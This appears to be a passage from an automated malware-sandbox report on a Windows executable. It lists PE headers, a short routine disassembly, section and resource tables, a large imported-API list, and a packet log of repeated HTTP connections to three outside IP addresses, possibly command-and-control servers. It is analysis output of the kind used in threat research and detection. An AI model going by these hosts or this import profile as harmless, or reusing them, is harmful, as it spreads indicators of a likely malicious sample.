                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:948cc502fe9226992dce9417f952fce3
                      Instruction
                      call 00007F2CD4E99413h
                      jmp 00007F2CD4E98D1Fh
                      push ebp
                      mov ebp, esp
                      push esi
                      push dword ptr [ebp+08h]
                      mov esi, ecx
                      call 00007F2CD4E98EFDh
                      mov dword ptr [esi], 0049FDF0h
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      and dword ptr [ecx+04h], 00000000h
                      mov eax, ecx
                      and dword ptr [ecx+08h], 00000000h
                      mov dword ptr [ecx+04h], 0049FDF8h
                      mov dword ptr [ecx], 0049FDF0h
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      push dword ptr [ebp+08h]
                      mov esi, ecx
                      call 00007F2CD4E98ECAh
                      mov dword ptr [esi], 0049FE0Ch
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      and dword ptr [ecx+04h], 00000000h
                      mov eax, ecx
                      and dword ptr [ecx+08h], 00000000h
                      mov dword ptr [ecx+04h], 0049FE14h
                      mov dword ptr [ecx], 0049FE0Ch
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      mov esi, ecx
                      lea eax, dword ptr [esi+04h]
                      mov dword ptr [esi], 0049FDD0h
                      and dword ptr [eax], 00000000h
                      and dword ptr [eax+04h], 00000000h
                      push eax
                      mov eax, dword ptr [ebp+08h]
                      add eax, 04h
                      push eax
                      call 00007F2CD4E9BABDh
                      pop ecx
                      pop ecx
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      lea eax, dword ptr [ecx+04h]
                      mov dword ptr [ecx], 0049FDD0h
                      push eax
                      call 00007F2CD4E9BB08h
                      pop ecx
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      mov esi, ecx
                      lea eax, dword ptr [esi+04h]
                      mov dword ptr [esi], 0049FDD0h
                      push eax
                      call 00007F2CD4E9BAF1h
                      test byte ptr [ebp+08h], 00000001h
                      pop ecx
                      Programming Language:
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      | Name | Virtual Address | Virtual Size | Is in Section |
                      | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |  |
                      | IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata |
                      | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x59d94 | .rsrc |
                      | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |  |
                      | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |  |
                      | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12e000 | 0x7594 | .reloc |
                      | IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata |
                      | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |  |
                      | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |  |
                      | IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata |
                      | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata |
                      | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |  |
                      | IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata |
                      | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |  |
                      | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |  |
                      | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |  |
                      | Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                      | .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
                      | .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                      | .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                      | .rsrc | 0xd4000 | 0x59d94 | 0x59e00 | eade62fa03b6e764e7a0f286d0b1e6f3 | False | 0.9653870392906815 | data | 7.955835081778554 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                      | .reloc | 0x12e000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
                      | Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
                      | RT_ICON | 0xd44b8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
                      | RT_ICON | 0xd45e0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
                      | RT_ICON | 0xd4708 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
                      | RT_ICON | 0xd4830 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.3177767354596623 |
                      | RT_ICON | 0xd58d8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | Great Britain | 0.5721311475409836 |
                      | RT_ICON | 0xd6260 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.5709219858156028 |
                      | RT_MENU | 0xd66c8 | 0x50 | data | English | Great Britain | 0.9 |
                      | RT_STRING | 0xd6718 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
                      | RT_STRING | 0xd6cac | 0x68a | data | English | Great Britain | 0.2735961768219833 |
                      | RT_STRING | 0xd7338 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
                      | RT_STRING | 0xd77c8 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
                      | RT_STRING | 0xd7dc4 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
                      | RT_STRING | 0xd8420 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
                      | RT_STRING | 0xd8888 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
                      | RT_RCDATA | 0xd89e0 | 0x54e4c | data |  |  | 1.0003335979109869 |
                      | RT_GROUP_ICON | 0x12d82c | 0x30 | data | English | Great Britain | 0.9583333333333334 |
                      | RT_GROUP_ICON | 0x12d85c | 0x14 | data | English | Great Britain | 1.25 |
                      | RT_GROUP_ICON | 0x12d870 | 0x14 | data | English | Great Britain | 1.15 |
                      | RT_GROUP_ICON | 0x12d884 | 0x14 | data | English | Great Britain | 1.25 |
                      | RT_VERSION | 0x12d898 | 0x10c | data | English | Great Britain | 0.5970149253731343 |
                      | RT_MANIFEST | 0x12d9a4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
                      | DLL | Import |
                      | WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
                      | VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
                      | WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
                      | COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
                      | MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
                      | WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
                      | PSAPI.DLL | GetProcessMemoryInfo |
                      | IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
                      | USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
                      | UxTheme.dll | IsThemeActive |
                      | KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW |
                      | USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, 
GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 23, 2024 08:25:53.353598118 CEST | 49718 | 80 | 192.168.2.6 | 194.233.65.154
Aug 23, 2024 08:25:53.364357948 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:53.364450932 CEST | 49718 | 80 | 192.168.2.6 | 194.233.65.154
Aug 23, 2024 08:25:53.372277021 CEST | 49718 | 80 | 192.168.2.6 | 194.233.65.154
Aug 23, 2024 08:25:53.377161026 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333453894 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333472967 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333483934 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333496094 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333595037 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333606005 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333616972 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333628893 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333729982 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333740950 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.333858013 CEST | 49718 | 80 | 192.168.2.6 | 194.233.65.154
Aug 23, 2024 08:25:54.333858013 CEST | 49718 | 80 | 192.168.2.6 | 194.233.65.154
Aug 23, 2024 08:25:54.334057093 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:25:54.334109068 CEST | 49718 | 80 | 192.168.2.6 | 194.233.65.154
Aug 23, 2024 08:25:54.339076042 CEST | 49718 | 80 | 192.168.2.6 | 194.233.65.154
Aug 23, 2024 08:25:54.344973087 CEST | 80 | 49718 | 194.233.65.154 | 192.168.2.6
Aug 23, 2024 08:26:09.414088964 CEST | 49721 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:09.418952942 CEST | 80 | 49721 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:09.419068098 CEST | 49721 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:09.429574966 CEST | 49721 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:09.435416937 CEST | 80 | 49721 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:10.267561913 CEST | 80 | 49721 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:10.267729044 CEST | 80 | 49721 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:10.267786980 CEST | 49721 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:10.945601940 CEST | 49721 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:11.964207888 CEST | 49722 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:11.969249010 CEST | 80 | 49722 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:11.969332933 CEST | 49722 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:11.979708910 CEST | 49722 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:11.984510899 CEST | 80 | 49722 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:12.814779997 CEST | 80 | 49722 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:12.814852953 CEST | 80 | 49722 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:12.815012932 CEST | 49722 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:13.492579937 CEST | 49722 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:14.510972977 CEST | 49723 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:14.515769005 CEST | 80 | 49723 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:14.515867949 CEST | 49723 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:14.526680946 CEST | 49723 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:14.532207012 CEST | 80 | 49723 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:14.532717943 CEST | 80 | 49723 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:15.381623983 CEST | 80 | 49723 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:15.381776094 CEST | 80 | 49723 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:15.381864071 CEST | 49723 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:16.039256096 CEST | 49723 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:17.065077066 CEST | 49724 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:17.070036888 CEST | 80 | 49724 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:17.070126057 CEST | 49724 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:17.077794075 CEST | 49724 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:17.082638025 CEST | 80 | 49724 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:17.917974949 CEST | 80 | 49724 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:17.918004036 CEST | 80 | 49724 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:17.918268919 CEST | 49724 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:17.921031952 CEST | 49724 | 80 | 192.168.2.6 | 45.157.69.194
Aug 23, 2024 08:26:17.925926924 CEST | 80 | 49724 | 45.157.69.194 | 192.168.2.6
Aug 23, 2024 08:26:22.993303061 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:22.998210907 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:22.998322010 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.010622978 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.015499115 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852689028 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852710009 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852720976 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852730989 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852742910 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852752924 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852765083 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852777004 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852787971 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852798939 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.852827072 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.852901936 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.861167908 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.914170027 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.939506054 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.939527988 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.939538956 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.939551115 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.939563036 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.939642906 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.940118074 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.940134048 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.940145016 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.940155029 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.940167904 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.940176964 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.940201044 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.940253019 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.940593004 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.940665007 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.940679073 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.940695047 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.940705061 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.940712929 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.940743923 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:23.941360950 CEST | 80 | 49725 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:23.941417933 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:24.523714066 CEST | 49725 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:25.542562008 CEST | 49726 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:25.547753096 CEST | 80 | 49726 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:25.547943115 CEST | 49726 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:25.558609962 CEST | 49726 | 80 | 192.168.2.6 | 37.187.158.211
Aug 23, 2024 08:26:25.567114115 CEST | 80 | 49726 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:26.440879107 CEST | 80 | 49726 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:26.440943956 CEST | 80 | 49726 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:26.440954924 CEST | 80 | 49726 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:26.440965891 CEST | 80 | 49726 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:26.440974951 CEST | 80 | 49726 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:26.440985918 CEST | 80 | 49726 | 37.187.158.211 | 192.168.2.6
Aug 23, 2024 08:26:26.440999031 CEST | 80 | 49726 | 37.187.158.211 | 192.168.2.6
